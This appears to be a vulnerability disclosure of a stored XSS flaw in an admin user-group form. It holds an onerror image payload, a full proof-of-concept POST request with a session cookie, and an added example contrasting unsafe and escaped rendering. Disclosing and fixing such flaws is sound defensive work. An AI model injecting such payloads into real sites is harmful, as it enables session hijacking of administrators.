Found by Chaitin Security Research Lab
`<img src=1 onerror=alert("xss");>`

url
http://192.168.3.129:8091/admin1#userGroup/index

poc

```
POST /admin1/userGroup/save HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/userGroup/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"id":"","title":"test<img src=1 onerror=alert(\"xss\");>","integral":0,"default":0,"status":1,"theme":"template"}
```

then you can view xss in url
http://192.168.3.129:8091/admin1#userGroup/index
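The report shows the `title` field being stored as sent and executing when the user group list is viewed. The following is an added example, not code from the project or the reporter, contrasting an assumed string-concatenation render of that field with an output-encoded one. The function names, the row markup and the sample `id` are hypothetical; the page does not show how the list is actually rendered.

```javascript
// Added example. escapeHtml, renderRowUnsafe and renderRowSafe are
// hypothetical names; the project's real rendering code is not on the page.

const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Encode the five characters that can change HTML parsing context
// in element content and quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed vulnerable pattern: the stored title is concatenated into markup,
// so the browser parses it as HTML when the list is displayed.
function renderRowUnsafe(group) {
  return "<tr><td>" + group.id + "</td><td>" + group.title + "</td></tr>";
}

// Hardened form: every stored value is encoded at the point of output.
function renderRowSafe(group) {
  return (
    "<tr><td>" + escapeHtml(group.id) + "</td><td>" +
    escapeHtml(group.title) + "</td></tr>"
  );
}

// Constructed sample: the record from the report as it would come back from
// storage. The id "7" is made up; the report sends an empty id on creation.
const storedGroup = JSON.parse(
  '{"id":"7","title":"test<img src=1 onerror=alert(\\"xss\\");>",' +
  '"integral":0,"default":0,"status":1,"theme":"template"}'
);

console.log("unsafe:", renderRowUnsafe(storedGroup));
console.log("safe:  ", renderRowSafe(storedGroup));
```

Where the list is built with DOM APIs instead of strings, assigning the value through `textContent` gives the same result without a hand-written encoder.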